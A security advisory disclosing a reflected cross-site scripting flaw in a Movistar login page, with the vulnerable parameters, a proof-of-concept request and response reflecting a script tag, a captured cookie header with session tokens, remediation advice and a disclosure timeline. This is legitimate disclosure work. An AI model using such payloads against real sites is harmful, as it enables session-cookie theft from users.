Pasar al contenido principal

2018-005: Cross Site Scripting (XSS Reflected)in Movistar

2018-005: Cross Site Scripting (XSS Reflected)in Movistar

Original release date: 19/07/2018
Last revised: 26/10/2018
Discovered by: Gonzalo Carrasco
Severity: 4.7/10 (CVSSv3 Base Score)


Movistar is the commercial brand of the Spanish telecommunications multinational Telefónica in Spain and Hispano-America, since May 1, 2010, for its fixed telephony, mobile, internet and television products. The "" platform provides services to all its customers in a comfortable and fast way.


The application accept it injection of JavaScript code reflecting it towards the user, allowing an attacker to simply send a malicious URL to his victim and obtain his session cookies, for example.


The vulnerable parameters are "xxxtipouserxxx", "xxxuserxxx" and "xxxpasswordxxx", and the exploitation is through GET method. Example:


GET /sr/sso/pub/servlet/login?tipoUs=P&xxxtypeUserxxx=titular&xxxmethodxxx=post&"> HTTP/1.1


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate


Cookie: utag_main=v_id:0163bd2d2ba00013f7057242907404044007100900bd0$_sn:3$_ss:0$_st:1531923930124$_pn:24%3Bexp-session$ses_id:1531921591410%3Bexp-session; CSI_clicks_acum_particulares=0; TLTSID=fs2id47fzyq1527887245416; CSI_ultima_particulares=1527887249216; CSI_url_inicio_particulares=/t5/Ayuda-Gestiones-Contratos-y-Factura-Internet/dynamicip-rima-tde-net/td-p/3086562;; _ga=GA1.2.370576869.1527887249; JSESSIONID=tvN0bP2Lz7Vb8LY6h3mN2h2621vNFvnrxvfBh7wY2xXY7lVwT0dS!905856882; 7a5f68f5df444a4f87157280100000f7=en; USER_CLASS=519150693; COL=18071809964270AHOGes00002018071877777; SEG_NAV=particulares; SEG_NAV_ES=particulares; MI_MOVISTAR=NABAGNLNN; _gid=GA1.2.168189848.1531917965; __utma=151739813.370576869.1527887249.1531917965.1531921565.2; __utmc=151739813; __utmz=151739813.1531921565.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __mc=-4526385577924454000; _mc_uuid=118218df-d4ed-47d1-ad5c-57dda7321439; _mc_sessorigin=seo; _mc_sessid=1531917965470; IC_XCOL=; IC_XCOL_1=; gwIsp_i3=mov; gwIsp_i3_d=mov; optimizelyEndUserId=oeu1531917967732r0.5122833511510013; optimizelySegments=%7B%7D; optimizelyBuckets=%7B%7D; compruebaCkE=1; TS866899=e7efedca1d13dfc670d7bd1158242e7aadf07615246704f85b4f449b; check=true; mbox=PC#56aaa47249c843fd84f693af4a3ecfb8.26_16#1595162840|session#3e5366681fb742b7aec35779677e69bf#1531923989; gwIsp=mov; __utmb=151739813.4.9.1531921718694; woid=19d4d5c4-2028-97a7-9ea6-940257cd65f0; CCLIJSESSIONID=sf1zbPGXdf0Tp9bmD77RTf7ndJhpNpj2lzylJ0ztVvV3JS2KG4K2!-624340416; AMP_TOKEN=%24NOT_FOUND; _gat_tealium_0=1; _gat=1


HTTP/1.1 200 OK

Server: XXXXXX

Content-Length: 2920

X-ORACLE-DMS-ECID: 3cfcdc11-88a2-4d98-bb23-b5f86b7a6d30-00b80194


Content-Type: text/html; charset=ISO-8859-1

Connection: close

<input name="xxxtipouserxxx" value="P"><script>prompt(1)</script>" type="hidden">


The effects of the discovered vulnerability are raised to a medium-critical level, depending on the interaction that is achieved with the victim user and their status, since if at the time of the attack, the user has an active session with his Movistar account, your current cookies could be captured.


Movistar website


Preventing XSS requires separation of untrusted data from active browser content:

  • The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  • Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
  • For rich content, consider auto-sanitization libraries like OWASPs AntiSamy or the Java HTML Sanitizer Project.
  • Consider Content Security Policy (CSP) to defend against XSS across your entire site.


19/07/2018 : Initial release
26/10/2018: Final release.


  • July 19th, 2018: Vulnerability acquired by Internet Security Auditors (
  • July 20th, 2018: Contact with Movistar.
  • July 20th, 2018: Answer from Movistar.
  • August 16th, 2018: Vulnerability corrected by Movistar, but don't confirmed yet.
  • August 29th, 2018: Vulnerability confirmed by Movistar.
  • October 26th, 2018: Advisory published.


The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.


Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.